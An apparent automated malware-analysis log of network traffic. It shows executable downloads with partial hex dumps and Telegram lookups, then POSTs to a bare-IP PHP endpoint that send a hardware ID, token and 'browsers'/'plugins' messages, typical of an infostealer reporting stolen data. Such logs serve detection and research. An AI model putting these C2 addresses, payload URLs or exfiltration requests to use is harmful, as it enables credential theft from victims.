Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 06 Sep 2024 06:17:49 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.22.1Date: Fri, 06 Sep 2024 06:17:54 GMTContent-Type: application/octet-streamContent-Length: 301608Last-Modified: Thu, 05 Sep 2024 22:53:24 GMTConnection: keep-aliveETag: "66da3664-49a28"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e9 35 da 66 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 0b 00 00 68 04 00 00 0a 00 00 00 00 00 00 de 86 04 00 00 20 00 00 00 a0 04 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 04 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 90 86 04 00 4b 00 00 00 00 a0 04 00 14 06 00 00 00 00 00 00 00 00 00 00 00 74 04 00 28 26 00 00 00 c0 04 00 0c 00 00 00 4c 86 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 66 04 00 00 20 00 00 00 68 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 14 06 00 00 00 a0 04 00 00 08 00 00 00 6a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 04 00 00 02 00 00 00 72 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 86 04 00 00 00 00 00 48 00 00 00 02 00 05 00 28 26 00 00 88 17 00 00 03 00 02 00 0b 00 00 06 b0 3d 00 00 e8 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 05 00 5d 00 00 00 01 00 00 11 2b 05 28 61 47 0b 30 7e 01 00 00 04 3a 4b 00 00 00 17 80 01 00 00 04 28 10 00 00 0a 20 e8 07 00 00 20 09 00 00 00 20 06 00 00 00 73 11 00 00 0a 28 12 00 00 0a fe 0e 00 00 fe 0d 00 00 28 13 00 00 0a 28 14 00 00 0a 20 0e 00 00 00 3f 0b 00 00 00 72 01 00 00 70 73 15 00 00 0a 7a 2a 00 00 00 36 2b 05 28 fd 88 56 62 28 01 00 00 06 2a 00 00 4e 2b 05 28 9b f4 78 44 28 15 00 00 06 02 28 16 00 00 0a 2a fa 2b 05 28 8a ae 02 32 28 15 00 00 06 1f 10 8d 1c 00 00 01 25 d0 06 00 00 04 28 17 00 00 0a 80 02 00 00 04 20 00 24 04 00 8d 1c 00 00 01 25 d0 07 00 00 04 28 17 00 00 0a 80 03 00 00 04 2a 00 6a 2b 05 28 90 b9 28 67 28 15 00 00 06 02 28 16 00 00 0a 02 03 28 06 00 00 06 2a 00 13 30 03 00 34 00 00 00 02 00 00 11 2b 05 28 fe 13 02 68 03 0b 16 0c 38 12 00 00 00 07 08 6f 18 00 00 0a 0a 06 28 19 00 00 0a 08 17 58 0c 08 07 6f 1a 00 00 0a 3f e2 ff ff ff 28 1b 00 00 0a 2a 13 30 06 00 4b 02 00 00 03 00 00 11 20 00 01 00 00 8d 1c 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.22.1Date: Fri, 06 Sep 2024 06:17:55 GMTContent-Type: application/octet-streamContent-Length: 353832Last-Modified: Thu, 05 Sep 2024 22:29:59 GMTConnection: keep-aliveETag: "66da30e7-56628"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ff 2f da 66 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 0b 00 00 34 05 00 00 0a 00 00 00 00 00 00 de 52 05 00 00 20 00 00 00 60 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 05 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 90 52 05 00 4b 00 00 00 00 60 05 00 14 06 00 00 00 00 00 00 00 00 00 00 00 40 05 00 28 26 00 00 00 80 05 00 0c 00 00 00 4c 52 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 32 05 00 00 20 00 00 00 34 05 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 14 06 00 00 00 60 05 00 00 08 00 00 00 36 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 05 00 00 02 00 00 00 3e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 52 05 00 00 00 00 00 48 00 00 00 02 00 05 00 28 26 00 00 88 17 00 00 03 00 02 00 0b 00 00 06 b0 3d 00 00 e8 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 05 00 5d 00 00 00 01 00 00 11 2b 05 28 f8 c3 60 65 7e 01 00 00 04 3a 4b 00 00 00 17 80 01 00 00 04 28 10 00 00 0a 20 e8 07 00 00 20 09 00 00 00 20 06 00 00 00 73 11 00 00 0a 28 12 00 00 0a fe 0e 00 00 fe 0d 00 00 28 13 00 00 0a 28 14 00 00 0a 20 0e 00 00 00 3f 0b 00 00 00 72 01 00 00 70 73 15 00 00 0a 7a 2a 00 00 00 36 2b 05 28 08 e7 3d 4f 28 01 00 00 06 2a 00 00 4e 2b 05 28 e7 70 13 35 28 15 00 00 06 02 28 16 00 00 0a 2a fa 2b 05 28 45 ee 47 64 28 15 00 00 06 1f 10 8d 1c 00 00 01 25 d0 06 00 00 04 28 17 00 00 0a 80 02 00 00 04 20 00 f0 04 00 8d 1c 00 00 01 25 d0 07 00 00 04 28 17 00 00 0a 80 03 00 00 04 2a 00 6a 2b 05 28 2f 64 11 64 28 15 00 00 06 02 28 16 00 00 0a 02 03 28 06 00 00 06 2a 00 13 30 03 00 34 00 00 00 02 00 00 11 2b 05 28 a8 b7 52 62 03 0b 16 0c 38 12 00 00 00 07 08 6f 18 00 00 0a 0a 06 28 19 00 00 0a 08 17 58 0c 08 07 6f 1a 00 00 0a 3f e2 ff ff ff 28 1b 00 00 0a 2a 13 30 06 00 4b 02 00 00 03 00 00 11 20 00 01 00 00 8d 1c 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 06 Sep 2024 06:18:08 GMTContent-Type: application/octet-streamContent-Length: 2459136Last-Modified: Fri, 24 Nov 2023 13:43:06 GMTConnection: keep-aliveETag: "6560a86a-258600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 69 a8 60 65 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 25 00 d4 20 00 00 ca 04 00 00 00 00 00 7b 44 00 00 00 10 00 00 00 f0 20 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 25 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 db 23 00 f1 36 00 00 9c a2 24 00 28 00 00 00 00 d0 24 00 cc 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 24 00 88 e2 00 00 60 b2 23 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 b1 23 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 24 00 9c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 47 d3 20 00 00 10 00 00 00 d4 20 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 91 22 03 00 00 f0 20 00 00 24 03 00 00 d8 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 34 7c 00 00 00 20 24 00 00 62 00 00 00 fc 23 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b4 10 00 00 00 a0 24 00 00 12 00 00 00 5e 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 30 30 63 66 67 00 00 0e 01 00 00 00 c0 24 00 00 02 00 00 00 70 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 cc 12 00 00 00 d0 24 00 00 14 00 00 00 72 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 35 ff 00 00 00 f0 24 00 00 00 01 00 00 86 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 06 Sep 2024 06:18:08 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /fneogr HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1.exe HTTP/1.1Host: smkn2sumbawabesar.sch.idConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /fneogr HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cacheCookie: stel_ssid=f3c4d6f56f5d888bd9_3268186582621973209
Source: global traffic HTTP traffic detected: GET /fneogr HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cacheCookie: stel_ssid=f3c4d6f56f5d888bd9_3268186582621973209
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 46.8.231.109Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDGDAAKFHIEHIECAFBAAHost: 46.8.231.109Content-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 47 44 41 41 4b 46 48 49 45 48 49 45 43 41 46 42 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 44 43 38 33 32 35 45 38 45 42 39 32 39 32 35 33 38 32 31 39 33 0d 0a 2d 2d 2d 2d 2d 2d 49 44 47 44 41 41 4b 46 48 49 45 48 49 45 43 41 46 42 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 49 44 47 44 41 41 4b 46 48 49 45 48 49 45 43 41 46 42 41 41 2d 2d 0d 0a Data Ascii: ------IDGDAAKFHIEHIECAFBAAContent-Disposition: form-data; name="hwid"3DC8325E8EB92925382193------IDGDAAKFHIEHIECAFBAAContent-Disposition: form-data; name="build"default------IDGDAAKFHIEHIECAFBAA--
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBFHJEGDAFHIJKECFBKJHost: 46.8.231.109Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 46 48 4a 45 47 44 41 46 48 49 4a 4b 45 43 46 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 38 64 31 63 62 31 30 32 61 62 36 31 38 36 36 65 31 30 36 66 33 30 30 34 63 36 35 61 32 36 62 62 66 35 32 63 32 65 30 62 34 65 62 34 34 39 64 30 64 63 37 62 31 35 31 63 63 61 33 32 61 38 30 36 62 62 39 34 30 63 0d 0a 2d 2d 2d 2d 2d 2d 45 42 46 48 4a 45 47 44 41 46 48 49 4a 4b 45 43 46 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 45 42 46 48 4a 45 47 44 41 46 48 49 4a 4b 45 43 46 42 4b 4a 2d 2d 0d 0a Data Ascii: ------EBFHJEGDAFHIJKECFBKJContent-Disposition: form-data; name="token"a98d1cb102ab61866e106f3004c65a26bbf52c2e0b4eb449d0dc7b151cca32a806bb940c------EBFHJEGDAFHIJKECFBKJContent-Disposition: form-data; name="message"browsers------EBFHJEGDAFHIJKECFBKJ--
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBFBKFBGIIIDGDGCFCGIHost: 46.8.231.109Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 46 42 4b 46 42 47 49 49 49 44 47 44 47 43 46 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 38 64 31 63 62 31 30 32 61 62 36 31 38 36 36 65 31 30 36 66 33 30 30 34 63 36 35 61 32 36 62 62 66 35 32 63 32 65 30 62 34 65 62 34 34 39 64 30 64 63 37 62 31 35 31 63 63 61 33 32 61 38 30 36 62 62 39 34 30 63 0d 0a 2d 2d 2d 2d 2d 2d 45 42 46 42 4b 46 42 47 49 49 49 44 47 44 47 43 46 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 45 42 46 42 4b 46 42 47 49 49 49 44 47 44 47 43 46 43 47 49 2d 2d 0d 0a Data Ascii: ------EBFBKFBGIIIDGDGCFCGIContent-Disposition: form-data; name="token"a98d1cb102ab61866e106f3004c65a26bbf52c2e0b4eb449d0dc7b151cca32a806bb940c------EBFBKFBGIIIDGDGCFCGIContent-Disposition: form-data; name="message"plugins------EBFBKFBGIIIDGDGCFCGI--
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBFCAKKKFBGDGCAKFCFHHost: 46.8.231.109Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 46 43 41 4b 4b 4b 46 42 47 44 47 43 41 4b 46 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 38 64 31 63 62 31 30 32 61 62 36 31 38 36 36 65 31 30 36 66 33 30 30 34 63 36 35 61 32 36 62 62 66 35 32 63 32 65 30 62 34 65 62 34 34 39 64 30 64 63 37 62 31 35 31 63 63 61 33 32 61 38 30 36 62 62 39 34 30 63 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 43 41 4b 4b 4b 46 42 47 44 47 43 41 4b 46 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 43 41 4b 4b 4b 46 42 47 44 47 43 41 4b 46 43 46 48 2d 2d 0d 0a Data Ascii: ------FBFCAKKKFBGDGCAKFCFHContent-Disposition: form-data; name="token"a98d1cb102ab61866e106f3004c65a26bbf52c2e0b4eb449d0dc7b151cca32a806bb940c------FBFCAKKKFBGDGCAKFCFHContent-Disposition: form-data; name="message"fplugins------FBFCAKKKFBGDGCAKFCFH--
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAAAFBGDBKKEBGCFCBFHost: 46.8.231.109Content-Length: 7603Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/sqlite3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKFHCFBGIIJKFHJDHDHHost: 46.8.231.109Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFIIIDAFBFBKECBGDBGIHost: 46.8.231.109Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
